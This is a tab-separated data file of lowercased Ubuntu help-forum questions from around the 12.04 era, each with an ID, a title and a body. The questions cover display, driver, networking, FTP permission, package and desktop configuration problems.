174195	gdbus.error when trying to enable second screen	i connected an external screen to my laptop , but my desktop did n't automagically extend to it , as it used to do about a year ago ( older version of ubuntu ) . i went to the display settings . the screen was listed there ( correct resolution , brand name , etc. ) . but when i put the switch on 'on ' and click 'apply ' , i get this error : failed to apply configuration : % s gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gnome.settingsdaemon.xrandr_2 ' on object at path /org/gnome/settingsdaemon/xrandr it 's been like this for a few months now , but i 'd really like to be able to use an external screen/beamer again . any ideas ? thanks .
174196	why is apt-get not install mysql server 5.5	i have mysql server 5.1 installed . i want to update it to 5.5 . i took a back up and uninstalled 5.1 using this command sudo apt-get -- purge remove mysql-server* when i again used apt to install mysql server 5.5 it did not install it apt-get install mysql-server it again installed the same version . why is apt not installing the never version
174199	“copy to” and “move to” context menu options in nautilus3	i used to remove the actions i do not need in good old nautilus2 by editing the /usr/share/nautilus/ui/nautilus-directory-view-ui.xml file . is there any way to modify the context menu in the latest nautilus3 ubuntu 12.04 ?
174200	server wo n't ping outside network	i just installed server 12.04 onto a spare desktop . everything is working good except when i try to ssh using my external ip address . my /ect/network/interfaces file : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.0.5 netmask 255.255.255.0 broadcast 192.168.0.255 network 192.168.0.0 gateway 192.168.0.1 dns-nameservers 192.168.0.1 i have tried to use dhcp as well , but still no luck . i know the server can connect to the outside because it can update , but when i try to ping an outside ip address i receive no response packets . i 've run older ubuntu servers before , but i 've never ran into this problem . i can ssh in using my internal ip addresses , so normally i would think it was a problem with port forwarding , but because of the lack of response pings i think it is a configuration error .
174204	is it worth it to change from ext4 to ext3 in order to use partimage ?	i am looking for a partition imaging program , like norton ghost or acronis true image , that will run on the pc ( not from live-cd or usb ) and can save the image onto a separate partition . i am brand new to linux/ubuntu , so it must be with a gui front-end . i have been searching around and the only application i have been able to find to suit my needs is partition image ( partimage ) , but it does not support the ext4 file system . can you recommend an alternative that supports ext4 or am i better off repartitioning my hdd for a fresh install with ext3 ( or one of the other file systems ) to satisfy the partimage limitations ? i am having a lot of problems configuring ubuntu ( will get back to that later ) , but a working imaging software is an absolute must , so i can quickly restore the system when i screw something up and so i can learn from my mistakes . i am getting really tired of re-installing ubuntu from scratch ( 6 times over the past three days ) and i am slowly reaching the point where i consider using the install cd as a frisbee and going back to windows : (
174207	ntfs filesystem not being read on my windows dualboot	i formatted my entire disk except my windows partition and made two partitions . one for ubuntu and one for personal stuff . my ubuntu partition is in ext4 so windows does n't recognize it . but my other partition is ntfs . but , windows does n't recognize that either . i 'm running 12.04 along with windows 7 professional .
174208	what does `` compiling a kernel '' mean ?	what is meant by term kernel compilation ? does it involve working directly on the source code of the kernel ; making changes to the kernel program and then compiling the whole source code ? or does it mean something different ? if compiling the kernel involves working on the source code ; then where do i get the kernel source code ? and after somebody compiles the kernel according to his needs , then does kernel automatically get registered in grub file and ready for the next boot time ?
174211	mounting external hdd via windows/virtualbox	i have a windows 7 laptop with a vm running ubuntu 12.10 . i have an ide hdd that i 'd like to access , which is a usb hdd . i have plugged this into my windows machine , but it is not showing up as a drive . what i 'd therefore like to do , is mount this on my ubuntu vm . is this possible ? thanks
174214	removing recently used items in 12.04	how do i remove items from my recently accessed file in ubuntu 12.04 .
174216	ibm x3650 m3 installation 10.04lts	hi just about to purchase two ibm servers x3650 and need to run 10.04lts as it is the only version that will support a particular application . the server has the following spec : ibm system x3650 m3 - 6core , 48gb , 2x460w psu , multi burner dvd 7945kng x3650 m3 , xeon 6c e5645 80w 2.40ghz/1333mhz/12mb,1x4gb , o/bay hs 2.5in sas/sata , sr m5014 , multi-burner 460w p/s , rack intel xeon 6c processor model e5645 80w 2.40ghz/1333mhz/12mb 48gb 5tb hdd in a raid 5 config serveraid m5015 sas/sata controller ibm virtual media key does anyone know if this version of ubuntu will support this as i ca n't find anything on the web thanks in advance darren
174217	how to install the human icon theme ?	i want to install old ubuntu 6.06lts dapper drake icon set in my ubuntu 12.04lts precise pangolin . where can i get the icon theme of ubuntu 6.06 for ubuntu 12.04. even if i download from any site how can i install it in my latest 12.04 ? please anybody knows how to install old iconset of ubuntu 6.06 in latest version how can i install human-clearlook orange theme of ubuntu 6.06lts in 12.04 ? i install the human-theme from synaptic but gtk goes wrong and theme wont get apply..i think it need particular gtk-engine . anyone knows how can i get human orange theme in 12.04 i get theme like this i want theme alike that we had during 6.06lts
174225	is there a centralized history file for all the commands run from various terminals ?	i am aware that every terminal has it 's separate history , which can be viewed by the history command . commands issued on suppose terminal tty1 will be shown in the history of tty1 only and not in the history of any other terminal suppose tty2 . is there a file which stores all the commands fired from various different terminals ; irrespective of the terminal type ( tty , pts1 ) .
174226	equivalent of osx `` open '' in ubuntu unity ?	i know there is xdg-open , but it does not run in the background . it is not as easy as appending & at the end when calling this command from emacs . i often use ! then open in emacs dired , or c- ! and then open filename for emacs shell-command . is there another command which will allow me to continue using emacs while this file ( often a pdf ) is open ?
174230	switching from win7 to ubuntu 10.04	i 'm in the process of backing up my assorted junk and just wanting to if i can download all my stuff from skydrive once i 've installed ubuntu . i plan on using sd and ubuntu one to get my files across because i do n't have enough usb or blank discs to do it that way and i do n't have any external hdds to use either . i tried the liveusb version of 12.04 but all i got was a black screen that did nothing , not even showing my cursor but i got 10.04 working and i would like to know if i would be able to update to the latest without losing anything and if it still did n't work or gave me the same black screen , would i be able to revert back to my usb install of 10.04 again without losing any data . thanks
174231	firefox cant find server at start .ubuntu.com	i have a hp ml310 server with ubuntu 12.04 installed , i set a static ip then installed ubuntu desktop sudo apt-get install ubuntu-desktop after the update and upgrade command . on restart i click firefox on the launcher and it comes back with the message server not found firefox ca n't find the server at start.ubuntu.com . this is brand new install what 's seems to be the problem ? i now have noway back to the server to edit !
174234	how long does the ubuntu installation take and what to do after it ?	i 've got a hp probook 4515s , amd sempron si-42 ( 2,1 ghz ) , ati radeon hd 3200 , only 1gb ram . i 'm installing ubuntu 12.04 with a cd right now , and it seems to take about 20 minutes since . and its also my first time i use ubuntu and i wanted to know how to set up wlan ( a friend told me it doesnt work on my pc ) and maybe a link to a site telling my which things i need to install and what i should know and stuff .
174235	500 oops : can not change directory : /home/user/public_html , vsftpd error	i setup vsftpd on my ubuntu server 12.04 , it worked very good . until i tried to change the permissions of the user so the user could n't go in the / directory and only in the directories inside /home/user/public_html . it could have to do something with the fact that i did this : sudo chmod 700 -r / i have a user , ftpuser and he is inside a group , ftpusers . the permissions of /home/user/public_html are : drwxrwxr-x 9 ftpuser ftpusers 4096 my vsftpd file looks like this : listen=yes anonymous_enable=no local_enable=yes write_enable=yes local_umask=022 connect_from_port_20=no chroot_local_user=yes pam_service=vsftpd userlist_file=/etc/vsftpd.userlist userlist_enable=yes userlist_deny=no and in /etc/vsftpd.userlist there is only one line : ftpuser how do i solve this so i can login , it think it has to do something with permissions but i do n't now what it is ! ?
174237	how to fix microphone that sometimes has wrong volume , other times does n't work at all ?	i recently installed ubuntu 12.04 . i have had mic problems since 10.04 . at times my mic level is just really low and other times it just does n't work at all . i am using a gateway m-series . how can i get it working all the time and at the right level ?
174239	how to stop gnome from adding bars , clocks , menu , etc . every time i restart x or log in ?	i have two monitors and want for each display its own xscreen ( i.e. , twinview feature must be off ) . turned out that gnome has been duplicating clocks , bars , workspace , etc . every time i log in or restart x. i installed dconf-editor and found that under org > gnome > gnome-panel > layout , the fields object-id-list and toplevel-id-list had many entries instead of just one value for each attribute . right now i am able to delete all of them and leave just one for each attribute and it looks fine . the problem is that every time you log in or restart x , it does the same thing , and keep adding entries to those fields automatically . i could n't find where the dconf-editor profile text files are saved . how can i set this permanently ?
174241	can i install ubuntu from a live usb to which i have copied some additional data ?	i created a live usb for ubuntu 12.04 64 bit edition around a month ago . the installation went fine from the usb . i 've been adding some files not related to ubuntu to a folder on the usb drive . i want to know whether i can use the same usb to install the ubuntu again without removing the files that i have added to the usb in a separate folder .
174252	will computer being shut down due to power failure affect my system files , or speed in any way ?	i 've asked before as well but need to confirm again , in my country there are a lot of electricity outages . will computer being shut down due to power failure affect my system files , or ubuntu speed in any way ? please tell the 100 % accurate and confirmed thing as it 's important here . i do n't want to hear that those files or data will be lost which i would be writing like documents etc because it 's common sense , un-saved data will usually be lost , i want to hear will it affect system files or any change like that ? system speed etc . like for example i am downloading something from ubuntu software center and power breakdown occurs , will it have affect on system or future installation of that thing ?
174255	can i use ubuntu as a wireless media server which performs all decoding/processing server-side ?	i want to setup ubuntu 12.04 desktop as home media server . i have window 7 netbook and ubuntu 12.04lts laptop even a samsun galaxy note tablet ( android ) . two desktop in other room with dualboot win7 and ubuntu . sharp aquos plasma tv with wi-fi connected . i want to install ubuntu as media server to stream audio/video files over wi-fi . not only this i want this media server to use its own processing power to decode ans stream so that on remote end only file can play without using their own resource . is it possible to use ubuntu as media server to stream files without making the remote end to use there own resource . i want only bandwidth of wi-fi to be use in this and media center hardware resource.remote end gadget should use only speaker and screen and not processing power of their own . please any suggestion is it possible to do so ?
174260	how to get ubuntu version number on the wallpaper ?	i want to have ubuntu version name on my desktop wallpaper same as we have at login screen ( ldm greeter ) of ubuntu 12.04lts at bottom . i want the same way on my desktop wallpaper on opposite side ( left of screen ) . with same font and same style that unity-greeter has . anyone knows how to get ubuntu version name on desktop alike unity greeter ? any way to use unity-greeter as desktop wallpaper ?
174262	how to install a gnome shell theme ?	i switched from unity to gnome 3.4 but i 'd like to tweak my desktop a bit . i want to use a gnome shell theme but the gnome tweak tool wo n't allow me to modify the gnome shell themes . i 've read somewhere that if i reinstall the gnome-shell then it would conflict with unity and i would n't be able to safely use unity anymore . is there a way to change the theme without reinstalling the gnome-shell ?
174263	what 's the best glassy theme for gnome 3 ?	i 'd like a glassy theme for my gnome 3 desktop but i ca n't find one that runs smoothly . some of them are laggy , others are too squared , and the rest are dark . is there a smooth , seamless , glassy theme for gnome 3 that runs well without lagging ?
174270	compiz live wallpaper plug-ins , where and how for 12.04	i have been looking on a few sites at live wallpaper plug-ins for compiz , but am un able to find a good tutorial for installation , many are very old , or a good list of known plug-ins . has any one used these ? thanks
174272	merge all split partition into root	hi all , currently i have partitions like the following : ( left to right ) '/ ' = 120gb /home = 100gb /media/data = 200gb am using only the disk space available in /home . currently am unable to use the disk space of '/ ' or /media/data . i want to merge all three partitions into the '/ ' . but i have my 80gb of data in /home . how do i merge all the partitions into '/ ' without losing my data and not crashing my system ?
174287	how do i convert an mp4 to an mp3 ?	i have some songs which are in mp4 format and i want to convert them into mp3 format . i am new to ubuntu/linux . so please explain the step by step process or give any software which can do the above job .
174289	how do i start an application as a service ?	so i would like a couple of applications to run as services when the machine reboots without the need to login , is this possible ? applications are : thunderbird mail xchat irc this way my email filters will work and i can log the irc channels i need if my machine restarts and i 'm not able to login at the time . i have them configured to auto start when i login nut how can i add them as a service ?
174292	how can i move all the window controls to the right ( or left ) ?	downloaded ubuntu tweak and set window controls to the right side . only some programs follow the rule . pidgin as an example has window controls on the right . but chrome , thunderbird , geany , still have controls on the left . how can i move all window controls ( close/min/max ) to the right ( or left ) ?
174297	how should i respond to 404 errors in winetricks ?	i am running into 404 errors using winetricks : user @ host : ~ $ bash winetricks gdiplus executing w_do_call gdiplus executing load_gdiplus executing mkdir -p /home/user/.cache/winetricks/gdiplus downloading http : //download.microsoft.com/download/a/b/c/abc45517-97a0-4cee-a362-1957be2f24e1/windowsxp-kb975337-x86-enu.exe to /home/user/.cache/winetricks/gdiplus -- 2012-08-10 10:29:24 -- http : //download.microsoft.com/download/a/b/c/abc45517-97a0-4cee-a362-1957be2f24e1/windowsxp-kb975337-x86-enu.exe resolving download.microsoft.com ( download.microsoft.com ) ... 23.66.230.90 , 23.66.230.8 , 23.66.230.74 , ... connecting to download.microsoft.com ( download.microsoft.com ) |23.66.230.90|:80 ... connected . http request sent , awaiting response ... 404 not found 2012-08-10 10:29:24 error 404 : not found . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- downloading http : //download.microsoft.com/download/a/b/c/abc45517-97a0-4cee-a362-1957be2f24e1/windowsxp-kb975337-x86-enu.exe failed -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- â user @ host : ~ $ bash winetricks tahoma executing w_do_call tahoma executing load_tahoma executing mkdir -p /home/user/.cache/winetricks/tahoma downloading http : //download.microsoft.com/download/office97pro/fonts/1/w95/en-us/tahoma32.exe to /home/user/.cache/winetricks/tahoma -- 2012-08-10 10:39:23 -- http : //download.microsoft.com/download/office97pro/fonts/1/w95/en-us/tahoma32.exe resolving download.microsoft.com ( download.microsoft.com ) ... 23.66.230.81 , 23.66.230.90 , 23.66.230.74 , ... connecting to download.microsoft.com ( download.microsoft.com ) |23.66.230.81|:80 ... connected . http request sent , awaiting response ... 404 not found 2012-08-10 10:39:24 error 404 : not found . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- downloading http : //download.microsoft.com/download/office97pro/fonts/1/w95/en-us/tahoma32.exe failed -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- how should i respond to these ? is there a way to get this stuff straight out of my windows installation ( dual booted ) ? are there mirrors that i can point winetricks to in order to get these files ?
174305	dns servers not correctly set in vpn	i have to use an openvpn network to work from home , and i occasionally have problems getting dns to resolve . the problem comes and goes , and i ca n't reproduce it reliably . i took the openvpn config that my employer provided and fed it into the `` import '' part of the vpn tab in the network manager settings ( after installing network-manager-openvpn , of course ) . the dns servers automatically provided by the vpn did not appear to work reliably . so i went to the `` ipv4 settings '' tab of the vpn settings and changed it to `` automatic ( vpn ) addresses only '' and put the search domain and servers in by hand . however , if i go to `` connection information '' , i still see my system dns resolvers listed , and i can not resolve anything that is n't on public dns .
174312	how can i set my ubuntu 12.04 lts to boot to console without gui ?	so i installed ubuntu server to run some tests on a vm . for various reasons i could n't get a specific deb file , and instead of using a shared folder i decided it would be a good idea to install ubuntu-desktop so i can run firefox and grab the file directly from the web . now , every time i boot my machine i get the graphical interface , but i have no reason for it since i 'm running tests with the lamp server . i tried this how do i boot into console mode ? and this possible to install ubuntu-desktop and then boot to no gui if anyone has any idea for a solution , i 'd appreciate it . btw : i thought about simply uninstalling ubuntu-desktop , but i feel like i might need it in the future , so , i really just want to disable the gui . edit : while this solution is not perfect i realized , it works for now : on the how do i boot into console mode ? question , user michael k mentions that : '' okay another way would be to disable the lightdm service in init : /etc/init/lightdm.conf in there there is a section like this : start on ( filesystem and started dbus and ( drm-device-added card0 primary_device_for_display=1 or stopped udev-fallback-graphics ) ) '' while this worked perfectly , i ca n't access the gui with the startx command - the system just crashes . and i guess i 'll need to uncomment the section to load startx . considering the fact that i want to keep the server running for as long as possible , having to restart it every time i want to log in the gui is kinda unproductive . edit2 : i guess it 's possible simply to kill the gui ( how to stop the unity desktop ) when i log in the system , it 's still counter productive , but it works too . edit3 : michael k 's reply worked fine . i just realized that to call the gui i need to run lightdm and not startx
174315	xtables-addon installation failed	i have a server with ubuntu 12.04 and when i try to install xtables-addon with this command module-assistant auto-install xtables-addons-source i get this error bad luck , the kernel headers for the target kernel version could not be found and you did not specify other valid kernel headers to use . if the running kernel has been shipped with the debian distribution , please install the package linux-headers-3.2.13-grsec-xxxx-grs-ipv6-64 . if your kernel source tree ( or headers ) is located in some non-usual location , please set the kerneldirs environment variable to the path of this directory , or ( alternatively ) specify the source directory we build for with the -- kernel-dir option in module-assistant calls . if i run uname -r i get this : 3.2.13-grsec-xxxx-grs-ipv6-64 i think that my host have modified the installed kernel ubuntu . how can i fix this ? thanks
174316	nvidia driver problems : 1440x900 resolution - 12.04	i installed 12.04 and my system works fine . but after updating packages with the update manager , problems occurred . i ca n't activate the nvidia drivers ( control center - > additional drivers ) . when i try to activate them , i get a error : sorry , installation of this driver , failed . the error indicates a log file , /var/log/jockey.log . i have seen : warning : modinfo for module nvidia_current failed : error : modinfo : could not find module nvidia_current error : xorgdriverhandler.enable ( ) : package or module not installed , aborting i have tried with 295.33 and 295.40 . but it does n't work . i have tried to reconfigure xorg.conf , with a lot of parameters . but i have n't got that it works . and i have tried to create a monitors.xml on /config , with the correct resolution , but when i log , i get another error : resolution not compatible . but before the update , that config works fine .
174319	pasting text into keyring access prompt	i have quite a few keys i manage with seahorse , and the passwords to them are quite complex , and kept in a safe method from which i must paste them ( they are 64 characters ) . when i attempt to use these keys ( sign , encrypt , etc ) , i am prompted with the agent to enter the key password . however , this agent refuses to accept pasted data ( the password ) , and due to my having many keys , entering the passwords painstakingly ( even just for the first time to save it to the keyring ) is prohibitively difficult . is there a workaround that will allow pasting into this window ?
174320	12.04 running slow on acer aspire 5738zg	i installed 12.04 but it seems to run rather slow ( a little laggy when minimizing , some applications open slowly , youtube 1080p videos are laggy as well ) . i 'm with the hd4650 graphics card and found some drivers that need to be activated but after i try to install them , i end up with an error saying that downloading and installing drivers failed . do you have any idea what 's wrong , cos i think with this hardware , the os must be running like a lightning .
174325	how do i make terminator emulator appear and disappear like guake ?	i am using terminator 0.96 as terminal emulator . how can i make it run in the background and make it appear/disappear like guake terminal ( i.e . using a shortcut key ) .
174326	will ubuntu 12.04 lts run faster when installed individually instead of in the windows folder ?	i have lots of freezes and stuff ... so i was wondering if i installed ubuntu individually instead of inside my windows installation , then it would perform much better . i assume that because then ubuntu would n't have to navigate to it 's folder all of the time . i might also be able to access folders from my hard drive as well , even with my windows installation broken . so would it perform any better if i installed it individually without using an os ?
174328	battery not charging beyong a certain percentage	after checking two hp laptops , one relatively new , only 2 months old and the battery is less than a week old . the other one is about a year old . both have the same issue . the laptop 's battery charges up to a certain percentage and then stops right there . here is an image of what i see when checking the charge : the way i read this is that the total battery energy by design is 88.8wh . after 12 hours charging ( after discharging the battery completely to recalibrate ) it gets to 34.1wh and stays there . only 38.4 % of the 100 % battery charging level . the other laptop does the same but up to 32.1 % . here is another pic with the /proc info : and yet another one with the acpi -v command : i checked if the connection was grounded . i checked that the cable connected to the laptop was good , even checked with a tester the current , voltage , etc.. somehow is not charging completely or not showing the correct percent .
174331	how do i configure the live usb to install additional packages ?	i have saved all the packages from the directory /var/cat/apt/archives to usb . is it possible to configure the live usb to accommodate all these extra packages /var/cache/apt/archives ; so that it installs all of them during the fresh install / reinstall process . i do n't want to install each of the downloaded package manually .
174335	how to remove ubuntu from my windows 7 64 bit	i used the version of ubuntu that allows you to install through windows . when i start my system it asks me if i want to select ubuntu or windows 7 . no problem , but i wanted to dual boot by giving ubuntu 250 gb and keep 2500 gb for my windows . the only problem is i am afraid that if i install ubuntu on my machine and use the new partition i created that i will not actually be able to boot into it ( because i already have a version installed ) also , if i just install ubuntu from an iso will it let me select which system to boot into , or am i better off to leave it how it is now ? thanks
174337	having problems with unity spread window on second click	i canâ´t spread window by click twice on the unity launcher after setting for something in ibus , and i am not sure is this a ibus problem . problem reproduce video ( < 1min ) : http : //www.sendspace.com/file/wkt5n6 open some windows to check if spread window function works normally . change some setting in ibus . click on launcher . expected result : it works normally as the video shown . environment : ubuntu 12.04 , unity 5.14.0 ( sorry for my bad english . ) == edit == it seems that spread window function wonâ´t work when show language panel = always
174345	linux administration job certification recommendations	i just got my linux+ today , and i am wondering what i should get next . i would like to land a job in linux server administration after i graduate ( > 1 year ) . right now i have linux+ , lpic-1 , and windows 7 cert . by the time i graduate , i 'll have some windows server certs and ccna ( required to graduate ) . i was thinking of getting security+ , but beyond that , i 'm not sure what other certs i should get for a linux administration job . suggestions based on experience are much appreciated .
174355	gufw does n't show my current iptables rules	i bought a new machine , so , what i did was save my current iptables using iptables-save and imported the rules into the new machine with iptables-restore command . if i run iptables -l command in the new machine i can see all my rules , but if i open gufw i ca n't see them . somebody can help me ? nonox
174361	how do i programmatically detect presence changes in the messaging menu ?	is there a way to subscribe to messaging menu events ? specifically , i 'm looking for a signal ( over dbus ? ) that is fired when the online presence status changes in the messaging menu
174362	installing live wallpapers ubuntu 12.04	how can i use live wall papers with ubuntu 12.04 like android
174366	how can i access files in my usb pendrive ( with yumi & ubuntu 12.04 installed in it )	i am new to ubuntu and would like to ask a question , any help would be greatly appreciated . so , i installed yumi multiboot usb creator into my pendrive , and added ubuntu 12.04 as one of the linux distributions , and i boot my computer using this pendrive . so i am running ubuntu from this pendrive but when i m using ubuntu how can i access the files in this pendrive ? ( because it also works as storage , i can access the files in it using explorer in windows ) when i go to files in ubuntu , i can find other devices like my other external harddisk , the harddisk in my computer ... etc , but i just ca n't find my usb pendrive hence i ca n't access the files in it ... please , can anyone tell me how to access my files in my pendrive ? is this possible ? thank you very much~
174367	extremely short battery life	in windows , my battery lasts several hours . in ubuntu 12.04 , it 's dead before an hour and a half . i 've installed http : //linrunner.de/en/tlp/docs/tlp-linux-advanced-power-management.html but it has not solved the problem . my power consumption looks like : the computer is a lenovo u400 with an ati radeon gpu .
174371	how activate nvidia drivers ?	yesterday i was having a few memory leaks with compiz , i decided to put this down to the new nvidia drivers that i installed . i purged everything with nvidia from my system and booted into ubuntu 12.04 with nouveau . i noticed i could n't install the drivers via jockey , the options were different . it now read : nvidia binary xorg driver and it would even give me an error message when i did decide to install . luckily , i managed to install the nvidia drivers via the xswat ppa and rebooted . guess ? my system booted into nouveau again and i tried to blacklist via the modprob.d/config file and blacklisted old nvidia drivers and nouveau and still my system used the open source noveau drivers . does anyone know how to 'activate ' the nvidia drivers ? how can i check that they 're even installed ? nvidia settings throws an error message warning me of no xorg driver .
174373	how to install ubuntu on a hp touchpad webos tablet ?	i found this http : //www.webos-internals.org/wiki/ubuntuchroot # alternative_step_1 : _re-partitioning_by_hand but i believe there is a better way to do it .
174375	how do i change the base language of a computer i inherited	i inherited a dell mini ! , running ubuntu 12.04 lts . the problem is that the language is set to vietnamese so i ca n't use it properly . when i change the language priority to having english as first priority it wo n't save my changes and logging out then in again i am still stuck in vietnamese . if i try to un-install the vietnamese language pack it say that the setupid permission is invalid . i ca n't seem to change this vis terminal . i tried to change the language via terminal but it gave me vietnamese error messages which i ca n't read . i then tried to reset ubuntu to it 's factory settings with : rm -rf .gnome .gnome2 .gconf .gconfd .metacity but it did n't do anything and nothing happened when i logged back in . please help me if you can because i ca n't use ubuntu in a foreign language !
174378	cowbuilder -- create -- distribution lucid fails	i 'm trying to create a build environment for lucid , and calling cowbuilder -- create -- distribution lucid fails with the messages below : get:1 http : //us-east-1.ec2.archive.ubuntu.com lucid release.gpg [ 189b ] hit http : //us-east-1.ec2.archive.ubuntu.com lucid release hit http : //us-east-1.ec2.archive.ubuntu.com lucid/main packages fetched 189b in 0s ( 2376b/s ) reading package lists ... i : obtaining the cached apt archive contents reading package lists ... building dependency tree ... 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . reading package lists ... building dependency tree ... apt is already the newest version . package cowdancer is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package cowdancer has no installation candidate i : unmounting dev/pts filesystem i : unmounting proc filesystem pbuilder create failed forking : rm -rf /opt/cowbuilder
174379	is it safe to upgrade os x from snow leopard via the app store on a dual-boot system ?	i have a macbook pro that dual-boots ubuntu 12.04 and os x snow leopard . i 'd like to upgrade os x to mountain lion , but have never done this on a dual-boot os x system before . will the upgrade work safely , or is it to likely to mess with the efi stuff and my partitions ?
174380	disk '______ ' does n't contain a valid partition table	having recently run through enablehibernatewithencryptedswap , i now get 3 separate 'disk does n't contain a valid partition table ' when i run sudo fdisk -l : disk /dev/mapper/ubuntu -- t10194-root does n't contain a valid partition table < br/ > disk /dev/mapper/ubuntu -- t10194-swap_1 does n't contain a valid partition table < br/ > disk /dev/mapper/cryptswap1 does n't contain a valid partition table output of sudo swapon -- all -- verbose : swapon on /dev/mapper/ubuntu -- t10194-swap_1 < br/ > swapon : /dev/mapper/ubuntu -- t10194-swap_1 : read swap header failed : invalid argument how can i get rid of the 3 separate 'does n't contain a valid partition table ' errors ?
174381	openning networkmanager 's edit connections window from terminal	i need to open networkmanager 's edit connections window from terminal ( for ssh -x ) . what is the command that opens it ?
174382	x11 mouse themes not showing on desktop ( unity )	hi i have install a few different themes for the mouse cursor . they work well except on the desktop , taskbar or unity launcher where it defaults to the original theme . any help with this is much appreciated ...
174385	recovering password	my sister gave me her mini inspiron 1010 with ubuntu 8.04 that she bought in the philippines more than 3 years ago . the problem is she said she forgot her password so i cant upgrade my ubuntu . i tried doing this : boot the mini 9 while pressing esc every second when you see the `` mbr 2fa : '' prompt or similar , the boot process is stopped . press enter and esc very fast one after the other . you should then see the grub menu . using the up and down arrows , highlight the second option and press enter to boot into recovery mode . but nothing happens when i press enter and esc nothing happens .
174387	what does the asterisk in the netstat output mean ?	# netstat -at active internet connections ( servers and established ) proto recv-q send-q local address foreign address state tcp 0 0 localhost:30037 * : * listen tcp 0 0 localhost : ipp * : * listen tcp 0 0 * : smtp * : * listen tcp6 0 0 localhost : ipp [ : : ] : * listen what does the asterisk * in * : smtp mean ? why is there no ip address shown ?
174391	how do i check the character set used by ubuntu and probably change it	as the subject says , i am curious to know what character-set is used by ubuntu , is it ascii or something else like utf-8/utf-16 etc . and if possible how can i change the default character set .
174393	how to restart in live cd persistence ?	i installed a daily build 12.10 on my mac to test livecd . i already had a pen drive formatted to ext3 labeled casper-rw . i had to invoke the `` other options '' with the f6 button so that i could append `` persistent '' , but it did n't work . i clicked `` try ubuntu , '' started browsing the web , and did a restart . when i ran the livecd again , the persistence failed . how can i restart in livecd persistence ? thanks .
174394	jbd2 keeps writing to disk . is that normal/healthy ?	jbd2 keeps accessing the disk every few seconds for the last hour . is that supposed to happen ? i have this issue frequently after unsuspending my laptop . it drains my battery . if i reboot it goes away . any thoughts ?
174395	after having installed 12.04 get error message from update-manager	i want to download updates but i get this error message : das herunterladen der paketdateien ist gescheitert ... failed to fetch http : //de.archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center/gnome-control-center-data_3.4.2-0ubuntu0.3_all.deb 404 not found [ ip : 141.30.13.30 80 ] ... if i enter http : //de.archive.ubuntu.com/ubuntu/pool/main/g/gnome-control-center into a browser window , i can see gnome-control-center-data_3.4.2-0ubuntu0.4_all.deb , but not gnome-control-center-data_3.4.2-0ubuntu0.3_all.deb ( observe bold 4 , 3 ! ) .
174398	is there a google-reader like rss reader which i could install to my own host	and access it with browser ? like fever rss reader but from opensource world ?
174400	aget vs axel vs aria2	i 'm looking for a multi-threaded ( fast ) alternative to wget which can download large files . the choices seem to be aget , axel and aria2 . i 'm familiar with axel ( thanks to apt-fast ) . which is the best alternative ? edit ( based on scott 's suggestion ) : what i was looking for was a download accelerator that could download large files ( videos , tar files ) . i had not used command line accelerators before and it seemed there were quite few options out there . i was evaluating these , and wanted to seek opinion of anyone who has used one of these . my answer : i have installed both arai2 ( to download torrent files ) and axel to download smaller files like pdf , zip files .
174403	mounting encrypted file system on windows	is there a way to mount ( read/write ) an encrypted file system on windows ? by `` encrypted '' i mean whatever it is that ubuntu does to encrypt a file system when you choose that option during formatting . the underlying file system is in ntfs format . a related question : is it correct to assume that encrypting and the file system format are completely independent things ? in other words , if i chose to encrypt an ntfs file system and a ext4 file system , are they both encrypted the `` same '' way ? ( i understand that each file system lays out files differently , has different data structures etc ) .
174404	how to delete unreachable revisions from a shared repository in bazaar	a shared repository in bazaar stores all the revisions of all the branches . if you delete a branch that had some unique revisions in it , those revisions will still remain in the repository , and visible by the bzr heads -- dead-only command ( from the bzrtools plugin ) . how to delete these revisions from the shared repository ? or , how to delete branches in a way that their unique revisions will be cleaned up from the shared repository ?
174408	is there a way to see a list of unreachable revisions in bazaar ?	if i do an uncommit , bazaar gives me a revision id which i can use to retrieve the uncommitted revision , should i ever need it . if i do n't write it down right after the uncommit , is there a way to find this revision id again ? similarly , if i delete a branch from a shared repository , the unique revisions of the branch remain in the shared repository , but how can i find their revision ids ? common in both of these cases is that the revisions are `` unreachable '' , since they are not part of any branch .
174423	making a launcher for a command	how to execute a command just by clicking a shortcut on the desktop . i 'm still very new to linux , this would help alot . like for example i want to run steam.exe without no dwrite , so the command is 'wine steam.exe -no-dwrite ' and i want to be able to execute this command by just clicking a shortcut on the desktop . i think it is a shell script maybe ? i dunno , like i said , i am new , and any help would be greatly appreciated .
174425	ca n't retrieve minimized libreoffice writer	when i minimize an open document i am working on in libreoffice writer , it disappears into the launcher panel . it does not show any little white arrow beside the libreoffice writer icon . when i click it , it opens up a new document . i can not get my original document back unless i do super+w . does anyone have a fix , or is this a new bug ? running 12.04 lts .
174436	creating .desktop file	i have tried to create a .desktop file to run vncviewer ( tight vnc connecting to a mac ) . i have entered below into the file . [ desktop entry ] version=x.y name=vncviewer comment=this is my comment exec=/usr/bin/vncviewer 10.0.1.5:5900 terminal=true when i double click the file it returns `` there was an error launching the application . '' any suggestions what i have done wrong in my .desktop file ?
174440	how do i access the terminal ?	my question is in the title . how do i get to terminal in ubuntu 12.04 ?
174441	how to install and configure yate server ?	i am trying on a website to install and configure the yate server , but the program does not seem to work . please give me the steps or lines to enter in the terminal . i am on 11.10 .
